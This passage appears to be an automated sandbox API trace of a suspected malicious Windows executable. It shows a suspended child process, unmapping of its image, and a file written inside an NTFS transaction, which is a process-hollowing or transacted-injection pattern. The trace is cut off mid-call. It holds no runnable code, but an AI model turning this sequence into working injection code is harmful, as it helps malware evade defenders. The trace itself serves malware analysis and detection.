[0166.390] glTexImage2D () returned 0x0 [0166.390] glGenTextures () returned 0x0 [0166.390] glTexImage2D () returned 0x0 [0166.390] glGenTextures () returned 0x0 [0166.390] glTexImage2D () returned 0x0 [0166.391] glGenTextures () returned 0x0 [0166.391] glTexImage2D () returned 0x0 [0166.391] glGenTextures () returned 0x0 [0166.391] glTexImage2D () returned 0x0 [0166.391] glGenTextures () returned 0x0 [0166.391] glTexImage2D () returned 0x0 [0166.391] glGenTextures () returned 0x0 [0166.391] glTexImage2D () returned 0x0 [0166.392] glGenTextures () returned 0x0 [0166.392] glTexImage2D () returned 0x0 [0166.392] glGenTextures () returned 0x0 [0166.392] glTexImage2D () returned 0x0 [0166.392] glGenTextures () returned 0x0 [0166.392] glTexImage2D () returned 0x0 [0166.392] glGenTextures () returned 0x0 [0166.392] glTexImage2D () returned 0x0 [0166.392] glGenTextures () returned 0x0 [0166.393] glTexImage2D () returned 0x0 [0166.393] glGenTextures () returned 0x0 [0166.393] glTexImage2D () returned 0x0 [0166.393] glGenTextures () returned 0x0 [0166.393] glTexImage2D () returned 0x0 [0166.393] glGenTextures () returned 0x0 [0166.393] glTexImage2D () returned 0x0 [0166.393] glGenTextures () returned 0x0 [0166.394] glTexImage2D () returned 0x0 [0166.394] glGenTextures () returned 0x0 [0166.394] glTexImage2D () returned 0x0 [0166.394] glGenTextures () returned 0x0 [0166.394] glTexImage2D () returned 0x0 [0166.394] glGenTextures () returned 0x0 [0166.394] glTexImage2D () returned 0x0 [0166.394] glGenTextures () returned 0x0 [0166.395] glTexImage2D () returned 0x0 [0166.395] glGenTextures () returned 0x0 [0166.395] glTexImage2D () returned 0x0 [0166.395] glGenTextures () returned 0x0 [0166.395] glTexImage2D () returned 0x0 [0166.395] glGenTextures () returned 0x0 [0166.395] glTexImage2D () returned 0x0 [0166.395] glGenTextures () returned 0x0 [0166.395] glTexImage2D () returned 0x0 [0166.395] glGenTextures () returned 0x0 [0166.396] glTexImage2D () returned 0x0 [0166.396] glGenTextures () returned 0x0 [0166.396] glTexImage2D () returned 0x0 [0166.396] glGenTextures () returned 0x0 [0166.396] glTexImage2D () returned 0x0 [0166.396] glGenTextures () returned 0x0 [0166.396] glTexImage2D () returned 0x0 [0166.396] glGenTextures () returned 0x0 [0166.396] glTexImage2D () returned 0x0 [0166.397] glGenTextures () returned 0x0 [0166.397] glTexImage2D () returned 0x0 [0166.397] glGenTextures () returned 0x0 [0166.397] glTexImage2D () returned 0x0 [0166.397] glGenTextures () returned 0x0 [0166.397] glTexImage2D () returned 0x0 [0166.397] glGenTextures () returned 0x0 [0166.397] glTexImage2D () returned 0x0 [0166.398] glGenTextures () returned 0x0 [0166.398] glTexImage2D () returned 0x0 [0166.398] glGenTextures () returned 0x0 [0166.398] glTexImage2D () returned 0x0 [0166.398] glGenTextures () returned 0x0 [0166.398] glTexImage2D () returned 0x0 [0166.398] glGenTextures () returned 0x0 [0166.398] glTexImage2D () returned 0x0 [0166.398] glGenTextures () returned 0x0 [0166.399] glTexImage2D () returned 0x0 [0166.399] glGenTextures () returned 0x0 [0166.399] glTexImage2D () returned 0x0 [0166.399] glGenTextures () returned 0x0 [0166.399] glTexImage2D () returned 0x0 [0166.399] glGenTextures () returned 0x0 [0166.399] glTexImage2D () returned 0x0 [0166.400] glGenTextures () returned 0x0 [0166.400] glTexImage2D () returned 0x0 [0166.400] glGenTextures () returned 0x0 [0166.400] glTexImage2D () returned 0x0 [0166.400] glGenTextures () returned 0x0 [0166.400] glTexImage2D () returned 0x0 [0166.401] glGenTextures () returned 0x0 [0166.401] glTexImage2D () returned 0x0 [0166.401] glGenTextures () returned 0x0 [0166.401] glTexImage2D () returned 0x0 [0166.401] glGenTextures () returned 0x0 [0166.401] glTexImage2D () returned 0x0 [0166.401] glGenTextures () returned 0x0 [0166.401] glTexImage2D () returned 0x0 [0166.401] glGenTextures () returned 0x0 [0166.402] glTexImage2D () returned 0x0 [0166.402] glGenTextures () returned 0x0 [0166.402] glTexImage2D () returned 0x0 [0166.402] glGenTextures () returned 0x0 [0166.402] glTexImage2D () returned 0x0 [0166.402] glGenTextures () returned 0x0 [0166.402] glTexImage2D () returned 0x0 [0166.402] glGenTextures () returned 0x0 [0166.402] glTexImage2D () returned 0x0 [0166.403] glGenTextures () returned 0x0 [0166.403] glTexImage2D () returned 0x0 [0166.403] glGenTextures () returned 0x0 [0166.403] glTexImage2D () returned 0x0 [0166.403] glGenTextures () returned 0x0 [0166.403] glTexImage2D () returned 0x0 [0166.403] glGenTextures () returned 0x0 [0166.403] glTexImage2D () returned 0x0 [0166.403] glGenTextures () returned 0x0 [0166.404] glTexImage2D () returned 0x0 [0166.404] glGenTextures () returned 0x0 [0166.404] glTexImage2D () returned 0x0 [0166.404] glGenTextures () returned 0x0 [0166.404] glTexImage2D () returned 0x0 [0166.404] glGenTextures () returned 0x0 [0166.404] glTexImage2D () returned 0x0 [0166.404] glGenTextures () returned 0x0 [0166.405] glTexImage2D () returned 0x0 [0166.405] glGenTextures () returned 0x0 [0166.405] glTexImage2D () returned 0x0 [0166.405] glGenTextures () returned 0x0 [0166.405] glTexImage2D () returned 0x0 [0166.405] glGenTextures () returned 0x0 [0166.405] glTexImage2D () returned 0x0 [0166.405] glGenTextures () returned 0x0 [0166.405] glTexImage2D () returned 0x0 [0166.406] glGenTextures () returned 0x0 [0166.406] glTexImage2D () returned 0x0 [0166.406] glGenTextures () returned 0x0 [0166.406] glTexImage2D () returned 0x0 [0166.406] glGenTextures () returned 0x0 [0166.406] glTexImage2D () returned 0x0 [0166.406] glGenTextures () returned 0x0 [0166.407] glTexImage2D () returned 0x0 [0166.407] glGenTextures () returned 0x0 [0166.407] glTexImage2D () returned 0x0 [0166.407] glGenTextures () returned 0x0 [0166.407] glTexImage2D () returned 0x0 [0166.407] glGenTextures () returned 0x0 [0166.408] glTexImage2D () returned 0x0 [0166.408] glGenTextures () returned 0x0 [0166.408] glTexImage2D () returned 0x0 [0166.408] glGenTextures () returned 0x0 [0166.408] glTexImage2D () returned 0x0 [0166.408] glGenTextures () returned 0x0 [0166.408] glTexImage2D () returned 0x0 [0166.408] glGenTextures () returned 0x0 [0166.408] glTexImage2D () returned 0x0 [0166.409] glGenTextures () returned 0x0 [0166.409] glTexImage2D () returned 0x0 [0166.409] glGenTextures () returned 0x0 [0166.409] glTexImage2D () returned 0x0 [0166.409] glGenTextures () returned 0x0 [0166.409] glTexImage2D () returned 0x0 [0166.409] glGenTextures () returned 0x0 [0166.409] glTexImage2D () returned 0x0 [0166.409] glGenTextures () returned 0x0 [0166.410] glTexImage2D () returned 0x0 [0166.410] glGenTextures () returned 0x0 [0166.410] glTexImage2D () returned 0x0 [0166.410] glGenTextures () returned 0x0 [0166.410] glTexImage2D () returned 0x0 [0166.414] LoadIconA (hInstance=0x400000, lpIconName=0x80) returned 0x0 [0166.426] LineDDA (xStart=10, yStart=13, xEnd=133, yEnd=134, lpProc=0x45b4c8, data=0x0) [0174.648] RtlInitUnicodeString (in: DestinationString=0x19d898, SourceString="ole32.dll" | out: DestinationString="ole32.dll") [0174.648] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ole32.dll", BaseAddress=0x19d8d0 | out: BaseAddress=0x19d8d0*=0x75b00000) returned 0x0 [0174.648] RtlInitUnicodeString (in: DestinationString=0x19d898, SourceString="shell32.dll" | out: DestinationString="shell32.dll") [0174.648] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="shell32.dll", BaseAddress=0x19d8cc | out: BaseAddress=0x19d8cc*=0x75bf0000) returned 0x0 [0174.649] GetProcAddress (hModule=0x75b00000, lpProcName="CoCreateInstance") returned 0x74900060 [0174.651] GetProcAddress (hModule=0x75b00000, lpProcName="CoInitializeEx") returned 0x748d88d0 [0174.651] GetProcAddress (hModule=0x75bf0000, lpProcName="SHGetSpecialFolderPathW") returned 0x75d9f9c0 [0174.651] GetProcAddress (hModule=0x75bf0000, lpProcName="SHCreateItemFromParsingName") returned 0x75d4df60 [0174.651] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x1048) returned 0x7a3900 [0174.680] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x1000) returned 0x7a4950 [0174.680] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x28e00) returned 0x7a5958 [0174.684] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x28ee9) returned 0x7ce760 [0174.694] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x7a3900) returned 1 [0174.694] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x7a4950) returned 1 [0174.695] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x19d384, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0174.695] NtCreateFile (in: FileHandle=0x19d398, DesiredAccess=0x80100000, ObjectAttributes=0x19d364*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d37c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d398*=0x1d8, IoStatusBlock=0x19d37c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0174.697] NtCreateSection (in: SectionHandle=0x19d394, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x0, SectionPageProtection=0x2, AllocationAttributes=0x1000000, FileHandle=0x1d8 | out: SectionHandle=0x19d394*=0x1dc) returned 0x0 [0174.698] NtMapViewOfSection (in: SectionHandle=0x1dc, ProcessHandle=0xffffffff, BaseAddress=0x19d390*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19d38c*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x2 | out: BaseAddress=0x19d390*=0x2330000, SectionOffset=0x0, ViewSize=0x19d38c*=0x17b000) returned 0x40000003 [0174.699] NtClose (Handle=0x1d8) returned 0x0 [0174.699] NtClose (Handle=0x1dc) returned 0x0 [0174.701] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19d678*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19d908, hNewToken=0x0 | out: lpProcessInformation=0x19d908*(hProcess=0x1d8, hThread=0x1dc, dwProcessId=0xf88, dwThreadId=0xf8c), hNewToken=0x0) returned 1 [0174.780] NtQueryInformationProcess (in: ProcessHandle=0x1d8, ProcessInformationClass=0x0, ProcessInformation=0x19d758, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19d758, ReturnLength=0x0) returned 0x0 [0174.780] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe", NtPathName=0x19d380, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0174.780] NtCreateFile (in: FileHandle=0x19d394, DesiredAccess=0x80100000, ObjectAttributes=0x19d360*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d378, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d394*=0x1e4, IoStatusBlock=0x19d378*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0174.780] NtCreateSection (in: SectionHandle=0x19d390, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x0, SectionPageProtection=0x2, AllocationAttributes=0x1000000, FileHandle=0x1e4 | out: SectionHandle=0x19d390*=0x1e0) returned 0x0 [0174.780] NtMapViewOfSection (in: SectionHandle=0x1e0, ProcessHandle=0xffffffff, BaseAddress=0x19d38c*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19d388*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x2 | out: BaseAddress=0x19d38c*=0x2150000, SectionOffset=0x0, ViewSize=0x19d388*=0x9d000) returned 0x40000003 [0174.781] NtClose (Handle=0x1e4) returned 0x0 [0174.781] NtClose (Handle=0x1e0) returned 0x0 [0174.781] NtQueryVirtualMemory (in: ProcessHandle=0x1d8, Address=0x1000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19d368, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19d368*(BaseAddress=0x1000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xf000, State=0x10000, Protect=0x1, Type=0x0), ResultLength=0x0) returned 0x0 [0174.781] NtQueryVirtualMemory (in: ProcessHandle=0x1d8, Address=0x10000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19d368, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19d368*(BaseAddress=0x10000, AllocationBase=0x10000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x20000), ResultLength=0x0) returned 0x0 [0174.781] NtQueryVirtualMemory (in: ProcessHandle=0x1d8, Address=0x30000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19d368, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19d368*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000), ResultLength=0x0) returned 0x0 [0174.782] NtQueryVirtualMemory (in: ProcessHandle=0x1d8, Address=0x32000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19d368, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19d368*(BaseAddress=0x32000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xe000, State=0x10000, Protect=0x1, Type=0x0), ResultLength=0x0) returned 0x0 [0174.782] NtQueryVirtualMemory (in: ProcessHandle=0x1d8, Address=0x40000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19d368, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19d368*(BaseAddress=0x40000, AllocationBase=0x40000, AllocationProtect=0x2, RegionSize=0x15000, State=0x1000, Protect=0x2, Type=0x40000), ResultLength=0x0) returned 0x0 [0174.782] NtQueryVirtualMemory (in: ProcessHandle=0x1d8, Address=0x55000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19d368, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19d368*(BaseAddress=0x55000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xb000, State=0x10000, Protect=0x1, Type=0x0), ResultLength=0x0) returned 0x0 [0174.782] NtQueryVirtualMemory (in: ProcessHandle=0x1d8, Address=0x60000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19d368, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19d368*(BaseAddress=0x60000, AllocationBase=0x60000, AllocationProtect=0x4, RegionSize=0x35000, State=0x2000, Protect=0x0, Type=0x20000), ResultLength=0x0) returned 0x0 [0174.782] NtQueryVirtualMemory (in: ProcessHandle=0x1d8, Address=0x95000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19d368, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19d368*(BaseAddress=0x95000, AllocationBase=0x60000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000), ResultLength=0x0) returned 0x0 [0174.782] NtQueryVirtualMemory (in: ProcessHandle=0x1d8, Address=0x98000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19d368, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19d368*(BaseAddress=0x98000, AllocationBase=0x60000, AllocationProtect=0x4, RegionSize=0x8000, State=0x1000, Protect=0x4, Type=0x20000), ResultLength=0x0) returned 0x0 [0174.782] NtQueryVirtualMemory (in: ProcessHandle=0x1d8, Address=0xa0000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19d368, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19d368*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x2000, Protect=0x0, Type=0x20000), ResultLength=0x0) returned 0x0 [0174.782] NtQueryVirtualMemory (in: ProcessHandle=0x1d8, Address=0x19d000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19d368, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19d368*(BaseAddress=0x19d000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000), ResultLength=0x0) returned 0x0 [0174.782] NtQueryVirtualMemory (in: ProcessHandle=0x1d8, Address=0x19f000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19d368, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19d368*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000), ResultLength=0x0) returned 0x0 [0174.782] NtQueryVirtualMemory (in: ProcessHandle=0x1d8, Address=0x1a0000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19d368, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19d368*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000), ResultLength=0x0) returned 0x0 [0174.783] NtQueryVirtualMemory (in: ProcessHandle=0x1d8, Address=0x1a4000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19d368, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19d368*(BaseAddress=0x1a4000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xc000, State=0x10000, Protect=0x1, Type=0x0), ResultLength=0x0) returned 0x0 [0174.783] NtQueryVirtualMemory (in: ProcessHandle=0x1d8, Address=0x1b0000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19d368, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19d368*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000), ResultLength=0x0) returned 0x0 [0174.783] NtQueryVirtualMemory (in: ProcessHandle=0x1d8, Address=0x1b2000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19d368, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19d368*(BaseAddress=0x1b2000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x4e000, State=0x10000, Protect=0x1, Type=0x0), ResultLength=0x0) returned 0x0 [0174.783] NtQueryVirtualMemory (in: ProcessHandle=0x1d8, Address=0x200000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19d368, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19d368*(BaseAddress=0x200000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x1cc000, State=0x2000, Protect=0x0, Type=0x20000), ResultLength=0x0) returned 0x0 [0174.783] NtQueryVirtualMemory (in: ProcessHandle=0x1d8, Address=0x3cc000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19d368, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19d368*(BaseAddress=0x3cc000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000), ResultLength=0x0) returned 0x0 [0174.783] NtQueryVirtualMemory (in: ProcessHandle=0x1d8, Address=0x3d1000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19d368, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19d368*(BaseAddress=0x3d1000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x2f000, State=0x2000, Protect=0x0, Type=0x20000), ResultLength=0x0) returned 0x0 [0174.783] NtQueryVirtualMemory (in: ProcessHandle=0x1d8, Address=0x400000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19d368, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19d368*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000), ResultLength=0x0) returned 0x0 [0174.783] NtQueryVirtualMemory (in: ProcessHandle=0x1d8, Address=0x401000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19d368, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19d368*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x50000, State=0x1000, Protect=0x20, Type=0x1000000), ResultLength=0x0) returned 0x0 [0174.783] NtQueryVirtualMemory (in: ProcessHandle=0x1d8, Address=0x451000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19d368, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19d368*(BaseAddress=0x451000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x17000, State=0x1000, Protect=0x2, Type=0x1000000), ResultLength=0x0) returned 0x0 [0174.784] NtQueryVirtualMemory (in: ProcessHandle=0x1d8, Address=0x468000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19d368, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19d368*(BaseAddress=0x468000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x35000, State=0x1000, Protect=0x8, Type=0x1000000), ResultLength=0x0) returned 0x0 [0174.784] NtQueryVirtualMemory (in: ProcessHandle=0x1d8, Address=0x49d000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19d368, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19d368*(BaseAddress=0x49d000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x774f3000, State=0x10000, Protect=0x1, Type=0x0), ResultLength=0x0) returned 0x0 [0174.784] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19d380 | out: Wow64Process=0x19d380*=1) returned 1 [0174.785] Wow64DisableWow64FsRedirection (in: OldValue=0x19cac8 | out: OldValue=0x19cac8*=0x0) returned 1 [0174.785] GetSystemDirectoryW (in: lpBuffer=0x19c894, uSize=0x20a | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0174.785] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\system32\\ntdll.dll", NtPathName=0x19caa8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\system32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0174.785] NtCreateFile (in: FileHandle=0x19caf0, DesiredAccess=0x80100000, ObjectAttributes=0x19cab0*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\system32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19caa0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19caf0*=0x1e0, IoStatusBlock=0x19caa0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0174.785] NtCreateSection (in: SectionHandle=0x19caec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x0, SectionPageProtection=0x2, AllocationAttributes=0x1000000, FileHandle=0x1e0 | out: SectionHandle=0x19caec*=0x1e4) returned 0x0 [0174.786] NtMapViewOfSection (in: SectionHandle=0x1e4, ProcessHandle=0xffffffff, BaseAddress=0x19cae8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19cacc*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x2 | out: BaseAddress=0x19cae8*=0x24b0000, SectionOffset=0x0, ViewSize=0x19cacc*=0x1c1000) returned 0x40000003 [0174.786] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0174.786] NtClose (Handle=0x1e0) returned 0x0 [0174.786] NtClose (Handle=0x1e4) returned 0x0 [0174.789] NtReadVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x3f0000, Buffer=0x19cb04, NumberOfBytesToRead=0x2d0, NumberOfBytesRead=0x0 | out: Buffer=0x19cb04*, NumberOfBytesRead=0x0) returned 0x0 [0174.789] NtReadVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x3ee000, Buffer=0x19cdd4, NumberOfBytesToRead=0x320, NumberOfBytesRead=0x0 | out: Buffer=0x19cdd4*, NumberOfBytesRead=0x0) returned 0x0 [0174.789] NtReadVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x7ffb61d95200, Buffer=0x19d284, NumberOfBytesToRead=0x58, NumberOfBytesRead=0x0 | out: Buffer=0x19d284*, NumberOfBytesRead=0x0) returned 0x0 [0174.789] NtReadVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x601c50, Buffer=0x19d2dc, NumberOfBytesToRead=0x88, NumberOfBytesRead=0x0 | out: Buffer=0x19d2dc*, NumberOfBytesRead=0x0) returned 0x0 [0174.789] NtReadVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x6018f4, Buffer=0x19d0f4, NumberOfBytesToRead=0x1a, NumberOfBytesRead=0x0 | out: Buffer=0x19d0f4*, NumberOfBytesRead=0x0) returned 0x0 [0174.789] NtReadVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x601ad0, Buffer=0x19d2dc, NumberOfBytesToRead=0x88, NumberOfBytesRead=0x0 | out: Buffer=0x19d2dc*, NumberOfBytesRead=0x0) returned 0x0 [0174.790] NtReadVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x7ffb61d611a0, Buffer=0x19d0f4, NumberOfBytesToRead=0x14, NumberOfBytesRead=0x0 | out: Buffer=0x19d0f4*, NumberOfBytesRead=0x0) returned 0x0 [0174.795] NtUnmapViewOfSection (ProcessHandle=0x1d8, BaseAddress=0x400000) returned 0x0 [0174.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19d398*=0x0, ZeroBits=0x0, RegionSize=0x19d390*=0x7fff, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x19d398*=0x5d0000, RegionSize=0x19d390*=0x8000) returned 0x0 [0174.802] RtlInitUnicodeString (in: DestinationString=0x19d380, SourceString="TEMP" | out: DestinationString="TEMP") [0174.802] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="TEMP", Value=0x19d388 | out: Value="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 0x0 [0174.803] NtCreateTransaction (in: TransactionHandle=0x19d874, DesiredAccess=0x1f003f, ObjectAttributes=0x0, Uow=0x0, TmHandle=0x0, CreateOptions=0x0, IsolationLevel=0x0, IsolationFlags=0x0, Timeout=0x0, Description=0x0 | out: TransactionHandle=0x19d874*=0x1e4) returned 0x0 [0174.881] RtlSetCurrentTransaction (TransactionHandle=0x1e4) returned 1 [0174.881] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Cielert.tmp", NtPathName=0x19d380, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Cielert.tmp", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0174.881] NtCreateFile (in: FileHandle=0x19d878, DesiredAccess=0xc0100000, ObjectAttributes=0x19d360*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Cielert.tmp", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d378, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x2, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d878*=0x1e0, IoStatusBlock=0x19d378*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0174.967] RtlSetCurrentTransaction (TransactionHandle=0x0) returned 1 [0174.967] NtWriteFile (in: FileHandle=0x1e0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, 